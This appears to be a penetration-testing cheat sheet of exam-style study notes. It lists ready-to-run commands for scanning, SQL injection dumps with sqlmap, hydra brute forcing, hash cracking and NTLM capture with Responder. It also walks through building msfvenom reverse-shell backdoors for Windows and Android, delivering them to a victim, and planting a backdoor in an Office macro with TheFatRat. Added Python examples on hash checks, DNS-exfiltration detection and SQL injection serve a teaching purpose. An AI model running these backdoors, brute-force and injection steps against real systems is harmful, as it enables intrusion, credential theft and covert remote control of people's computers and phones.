  echo "nmap -n -Pn -sS -g 53 --stats-every 3m --max-retries 1 --max-scan-delay 20 --defeat-rst-ratelimit -T4 -p1-65535 $service $ip -oN $ip-tcp.txt" >> cmd_tcp.txt
done < live_hosts.txt

Web Enumeration

// dir enumeration
gobuster dir -u http://10.10.. -w /usr/share/wordlists/dirb/common.txt -t 50 -x php,html,txt -q

dir : directory brute forcing mode
-u : target URL
-w : wordlist
-t : threads / number of concurrent threads (default 10)
-x : file extensions to look for (php, html, txt)
-q : --quiet / don't print the banner and other noise

// wordpress enumeration
wpscan --url https://localchost.com --passwords <wordlist>
wpscan --url http://10.10.. -e u,vp
wpscan --url http://10.10.. -e u --passwords /path/rockyou.txt // brute force the enumerated users

-e = enumerate
u = usernames
vp = vulnerable plugins

// wordlist generation
cewl -w wordlist -d 2 -m 5 http://wordpress.com
-d = depth to spider the site
-m = minimum word length
-w = write the wordlist to a file

web exploitation

// sql injection
sqlmap -u http://10.10.197.40/administrator.php --forms --dump

-u = url
--forms = parse and test the forms found at the URL
--dump = dump the data retrieved through the SQLi

basic sqli injection
sqlmap -u 10.10.77.169 --forms --dump

-u = url
--forms = check the forms automatically
--dump = dump the database data entries

// list the databases
sqlmap -u "http://localchost.com/hey.php?artist=1" --dbs
// list the columns of a table
sqlmap -u "http://localchost.com/hey.php?artist=1" -D <database> -T artists --columns
// dump the chosen columns of the table inside the db
sqlmap -u "http://localchost.com/hey.php?artist=1" -D <database> -T artists -C adesc,aname,artist_id --dump

enumeration

enum4linux 10.10.60.11

bruteforcing

hydra -t 4 -l lin -P /usr/share/wordlists/rockyou.txt ssh://10.10.149.11
hydra -l lin -P /usr/share/wordlists/rockyou.txt ssh://10.10.149.118

stego

exiftool cats.png // metadata
zsteg cats.png // LSB steganography in PNG/BMP
binwalk -e cats.png // extract embedded files

// windows
snow -C -p "magic" readme2.txt // VERY IMPORTANT: whitespace steganography in text files
-p = password
// image steganography
openstego > extract data
// stegseek: cracks a steghide passphrase with a wordlist

misconfigured windows rpc

rpcclient -U "" -N 10.10.123.10 // null session

hashcracking

hashcat

hashcat -O -w 3 -m 0 56ab24c15b72a457069c5ea42fcfc640 /usr/share/wordlists/rockyou.txt --show

-m = hash type (0 = MD5, 20 = md5($salt.$pass))
-a = attack mode (0 = straight/wordlist, 3 = brute force/mask)
--show = show the cracked hash from the potfile

hashcat -O -a 0 -m 20 <md5hash>:<salt> /usr/share/wordlists/rockyou.txt
hashcat -O -a 0 -m 20 0c01f4468bd75d7a84c7eb73846e8d96:1dac0d92e9fa6bb2 /usr/share/wordlists/rockyou.txt --show

john

john --format=Raw-MD5 hash --wordlist=/usr/share/wordlists/rockyou.txt

- --format = hash format (list them with: john --list=formats | grep MD5)
- hash = file holding the hash (echo '<hash>' > hash)
- --wordlist = wordlist to crack with

to show the hash cracked
john --show --format=Raw-MD5 hash

- --show = print hash:cracked password

cryptography

// HashCalc
open a file in HashCalc
it will give you the hash of the file for MD5 or other algorithms

// MD5 calculator
it compares the MD5 of two files, which is what we need

// HashMyFiles
it lets you hash all the files inside a folder

// Veracrypt
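
What hash-identifier/hashid and the HashCalc/MD5-calculator comparison do, in code: guess the algorithm from the digest's shape and verify a file against an expected hash. This is an added example, not code from the notes; the length-to-algorithm table only covers unsalted hex digests, and the hashcat modes listed are the real ones (0, 100, 1400, 1700).

```python
"""Identify a hex digest by its length and verify data/files against it.
The 'abc' vectors used when run as a script are well-known test values."""
import hashlib
import hmac

# hex length -> (hashlib name, hashcat -m mode) for plain, unsalted digests
BY_LENGTH = {32: ("md5", 0), 40: ("sha1", 100), 64: ("sha256", 1400), 128: ("sha512", 1700)}


def identify_hash(h):
    """Return (algorithm, hashcat_mode), or None if the shape is unknown.
    'hash:salt' (the hashcat -m 20 layout above) is reported as salted with no mode,
    because the salt order (-m 10 vs -m 20) cannot be seen from the string."""
    h = h.strip().lower()
    if ":" in h:
        base = identify_hash(h.split(":", 1)[0])
        return ("salted " + base[0], None) if base else None
    if not h or any(c not in "0123456789abcdef" for c in h):
        return None
    return BY_LENGTH.get(len(h))


def verify_bytes(data, expected):
    """True if data hashes to `expected` (algorithm inferred from its length).
    compare_digest keeps the comparison constant-time."""
    algo, mode = identify_hash(expected) or (None, None)
    if mode is None:
        raise ValueError("unrecognised or salted hash; cannot verify directly")
    return hmac.compare_digest(hashlib.new(algo, data).hexdigest(), expected.strip().lower())


def verify_file(path, expected):
    """Same check for a file on disk, e.g. a downloaded tool against its published MD5."""
    with open(path, "rb") as f:
        return verify_bytes(f.read(), expected)


if __name__ == "__main__":
    print(identify_hash("56ab24c15b72a457069c5ea42fcfc640"))          # ('md5', 0)
    print(verify_bytes(b"abc", "900150983cd24fb0d6963f7d28e17f72"))  # True
```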

rainbowtables

Rainbow tables are precomputed chains of hashes and passwords, so a hash is cracked by lookup instead of computing new hashes at crack time.
// linux
rtgen // part of rainbowcrack
rtgen sha256 loweralpha-numeric 1 10 0 1000 4000 0 // generate a new rainbow table: hash charset min_len max_len table_index chain_len chain_num part_index
// windows
rtgen md5 loweralpha-numeric 1 4 1 1000 1000 0
then use the rainbowcrack app // add the hashes and select the rainbow table

Enumerating – Samba

search for commands
smbmap --help | grep -i username

smbmap -u "admin" -p "password" -H 10.10.10.10 -x "ipconfig"
-x = command to execute on the host

wireshark

wireshark filters

// filter by POST requests
http.request.method == "POST"
smtp // email
pop // email
dns.qry.type == 1 // A-record queries: the names looked up in this pcap
dns.flags.response == 0 // DNS queries only (no responses)
tcp // show tcp packets
// find packets
Edit > Find Packet > search in: Packet bytes > by: String > "pass" > Find

// DDoS attack
look at the packet counts in the first column,
then Statistics > IPv4 Statistics > Destinations and Ports

// tshark cli
tshark -r dns.cap | wc -l // count how many packets are in a capture
tshark -r dns.cap -Y "dns.qry.type == 1" -T fields -e dns.qry.name // show the names queried in this pcap
tshark -r dnsexfil.pcap -Y "dns.flags.response == 0" | wc -l // count the queries
tshark -r pcap -T fields -e dns.qry.name | sort | uniq | wc -l // unique DNS queries (uniq only drops adjacent duplicates, hence the sort); 56 in this capture
tshark -r pcap | head -n2 // look at the first packets to identify the DNS server side and 'special' queries
tshark -r pcap -Y "dns.flags.response == 0" -T fields -e dns.qry.name | sed "s/\.m4lwhere\.org//g" | tr -d "\n" // reassemble exfiltrated data: strip the domain and join the labels
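
The same analysis the tshark pipelines above do, applied to the query names tshark prints with -T fields -e dns.qry.name: count unique queries, flag the ones whose leftmost label looks like encoded data, and reassemble what was tunnelled out for the incident report. Added example, not from the notes; the query lines are constructed (the domain m4lwhere.org is the one from the commands above, and the "leaked" text is made up).

```python
"""Detection over DNS query names, i.e. over the output of
tshark -r capture.pcap -Y "dns.flags.response == 0" -T fields -e dns.qry.name
SAMPLE_QUERIES is constructed: three hex-encoded chunks sent as subdomains."""
import string

SAMPLE_QUERIES = """\
www.example.com
mail.example.com
www.example.com
4d616c7761726520.m4lwhere.org
6973206c65616b65.m4lwhere.org
64206865726521.m4lwhere.org
cdn.example.net
""".splitlines()


def count_unique(names):
    """What `... -e dns.qry.name | sort | uniq | wc -l` counts."""
    return len({n.strip() for n in names if n.strip()})


def looks_encoded(label, min_hex_len=12, max_len=20):
    """A leftmost label that is long, or long-ish and entirely hex, is a classic
    sign of data tunnelled in queries; real labels are usually short words."""
    is_hex = len(label) >= min_hex_len and all(c in string.hexdigits for c in label)
    return is_hex or len(label) > max_len


def suspicious_queries(names):
    """Queries worth a closer look, in capture order."""
    return [n for n in names if looks_encoded(n.split(".")[0])]


def reconstruct(names, domain):
    """Strip the exfil domain and join the hex labels in capture order (the
    sed/tr pipeline above), then decode so the analyst can see what left."""
    suffix = "." + domain
    hexdata = "".join(n[:-len(suffix)].replace(".", "")
                      for n in names if n.endswith(suffix))
    return bytes.fromhex(hexdata).decode("utf-8", errors="replace")


if __name__ == "__main__":
    print(count_unique(SAMPLE_QUERIES))                    # 6
    print(suspicious_queries(SAMPLE_QUERIES))              # the three m4lwhere.org names
    print(reconstruct(SAMPLE_QUERIES, "m4lwhere.org"))     # Malware is leaked here!
```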

Privilege escalation / reverse shell

ssh -p 2222 <user>@<ip>
sudo -l ### list the sudo permissions of the user

sudo vim -c ':!/bin/sh' ### privilege escalation when vim is allowed via sudo
https://gtfobins.github.io/

other

hydra -l root -P passwords.txt [-t 32] <ip> ftp
hydra -L usernames.txt -P pass.txt <ip> mysql
hashcat.exe -m <mode> hash.txt rockyou.txt -O
nmap -p443,80,53,135,8080,8888 -A -O -sV -sC -T4 -oN nmapOutput <ip>
wpscan --url https://10.10.10.10 --enumerate u
netdiscover -i eth0
john --format=raw-md5 password.txt // crack the hashes in password.txt back to plaintext

vulnerability scanning

nikto -h url -Cgidirs all

System hacking

// 1 - on a windows machine
wmic useraccount get name,sid // list users and their SIDs
// using a tool
Pwdump7.exe > C:\path\file.txt // dump the hashes to a file to crack
// using ophcrack to crack the hash with rainbow tables
ophcrack >> tables >> vista free
// cracking with rainbow tables, using winrtgen to create the table
winrtgen >> add table >> hash: ntlm
rainbowcrack >> select the obtained file >> select the directory created with winrtgen

// 2 - using responder to capture the traffic of the windows system
// run a shared folder on windows
// capture the ntlm hash >> crack it with john
chmod +x Responder.py
./Responder.py -I eth0
-I = interface // check it with ifconfig
// cracking the captured ntlm hash with john
john capture.txt

L0phtCrack // helps to crack ntlm password hashes stored on windows

// system hacking windows
// look for an exploit and try to get remote access to the victim using msfvenom, metasploit and a rat

msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -f exe LHOST=my.ip LPORT=my.port -o /root/Desktop/test.exe
-p = payload
--platform = OS
-a = architecture
-f = format of the payload
-o = output file

// now we try to share the file with the victim
// we try three forms
// #1 - option: apache
mkdir /var/www/html/share
chmod -R 755 /var/www/html/share
chown -R www-data:www-data /var/www/html/share
// copy test.exe to the new share folder
cp /root/Desktop/test.exe /var/www/html/share
// start the apache server
service apache2 start
// #2 - option (python 2)
python -m SimpleHTTPServer 80
// #3 - option (python 3)
python3 -m http.server 80
// now we open msfconsole to get a reverse shell with meterpreter
use exploit/multi/handler // similar to nc -nlvp <port>
set payload windows/meterpreter/reverse_tcp
set LHOST my.ip
set LPORT my.port
exploit // or: run
// share the file with the victim
http://my.ip/share
// inside the victim's machine
run the exe // test.exe served from the share
// look at the metasploit session
sysinfo // system info

// now we enumerate the w10 system to find misconfigurations
// using PowerSploit
upload /path/PowerUp.ps1 powerup.ps1 // from meterpreter
shell // switch from meterpreter to a windows shell
// now we execute powerup
powershell -ExecutionPolicy Bypass -Command ". .\PowerUp.ps1;Invoke-AllChecks"
// now we know whether windows is vulnerable to dll injection
// go back to meterpreter with exit, then run
run vnc // will open a VNC remote control on the victim

// Now we will try another method to gain access to a machine
// with TheFatRat
chmod +x fatrat
chmod +x setup.sh
chmod +x powerfull.sh
./setup.sh
// run fatrat
option 6 // create a fud backdoor [excellent]
option 3 // create apache + ps1
// put the lhost and lport
enter the name for the files: payload
option 3 // choose meterpreter/reverse_tcp
// payload generated
option 9 // back to the menu
option 7 // create a backdoor in an Office document
option 2 // windows macro; select lhost and lport
// enter the name for the doc file
// use custom exe backdoor: Y
option 3 // reverse_tcp
// the doc with the backdoor inside is generated

// share the document with the server (options 1 and 2 above)
// start msfconsole to get the meterpreter shell
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST my.ip
set LPORT my.port // LPORT (not RHOST): the handler listens locally
exploit // or: run

Mobile Hacking

// create a backdoor with msfvenom
msfvenom -p android/meterpreter/reverse_tcp --platform android -a dalvik LHOST=my.ip LPORT=my.port R > path/backdoor.apk
// share it with one of the three methods above
// now with metasploit
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST my.ip
set LPORT my.port
exploit -j -z // run the handler as a background job
// install the apk on the android device & the session will open
sessions -i 1 // will display the meterpreter
sysinfo // to know the os

// Using PhoneSploit (very important)
run phonesploit
option 3 // new phone
enter the ip // the phone's ip
option 4 // shell on the phone
// from the menu you can search, download, get info

Using the methodology

  1. netdiscover -i eth0
  2. nmap -p- 10.10.10.10 [ any IP ] port discovery
  3. nmap -p443,80,53,135,8080,8888 -A -O -sV -sC -T4 -oN nmapOutput 10.10.10.10
  4. gobuster dir -e -u http://10.10.10.10 -w wordlist.txt when a webserver is running
  5. trying sqli payloads on the forms
admin' --
admin' #
admin'/*
' or 1=1--
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1--
  6. bruteforcing servers
hydra -l root -P passwords.txt [-t 32] <IP> ftp
hydra -L usernames.txt -P pass.txt <IP> mysql
hydra -l USERNAME -P /path/to/passwords.txt -f <IP> pop3 -V
hydra -V -f -L <userslist> -P <passwlist> rdp://<IP>
hydra -P common-snmp-community-strings.txt target.com snmp
hydra -l Administrator -P words.txt 192.168.1.12 smb -t 1
hydra -l root -P passwords.txt <IP> ssh
  7. cewl example.com -m 5 -w words.txt custom wordlist
  8. search for vulns
searchsploit 'Linux Kernel'
searchsploit -m 7618 // copy the exploit into the current directory
searchsploit -p 7618[.c] // show the complete path
searchsploit --nmap file.xml // search for vulns inside an nmap XML result
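
Why the step-5 payloads work against a login built by string concatenation (the bug sqlmap --forms hunts for in the web exploitation section), and the parameterised form that stops them. This is an added example with a constructed in-memory SQLite table, not code from the notes; note the payloads are engine-specific, so the `#` comment form (MySQL syntax) is rejected by SQLite.

```python
"""Vulnerable vs. parameterised login check, run against the page's payloads.
The users table and its rows are constructed for the demo."""
import sqlite3


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    # Sample rows; a real application stores password hashes, never plaintext.
    db.executemany("INSERT INTO users (username, password) VALUES (?, ?)",
                   [("admin", "S3cret!"), ("lin", "rockyou")])
    return db


def login_vulnerable(db, username, password):
    """String concatenation: the input is spliced into the SQL text, so a quote
    ends the literal and the rest of the input becomes SQL syntax."""
    sql = ("SELECT username FROM users WHERE username = '%s' AND password = '%s'"
           % (username, password))
    row = db.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(db, username, password):
    """Parameterised query: values travel separately from the SQL, so the same
    payload is compared as a literal string and never parsed."""
    row = db.execute("SELECT username FROM users WHERE username = ? AND password = ?",
                     (username, password)).fetchone()
    return row[0] if row else None


PAYLOADS = ["admin' --", "admin' #", "' or 1=1--", "') or '1'='1--"]


def bypasses(login, db):
    """Map each payload to whether it logs in with a wrong password."""
    results = {}
    for p in PAYLOADS:
        try:
            results[p] = login(db, p, "wrong") is not None
        except sqlite3.Error:
            results[p] = False  # syntax error: the payload does not fit this query shape
    return results


if __name__ == "__main__":
    db = make_db()
    print(bypasses(login_vulnerable, db))  # "admin' --" and "' or 1=1--" are True
    print(bypasses(login_safe, db))        # all False
```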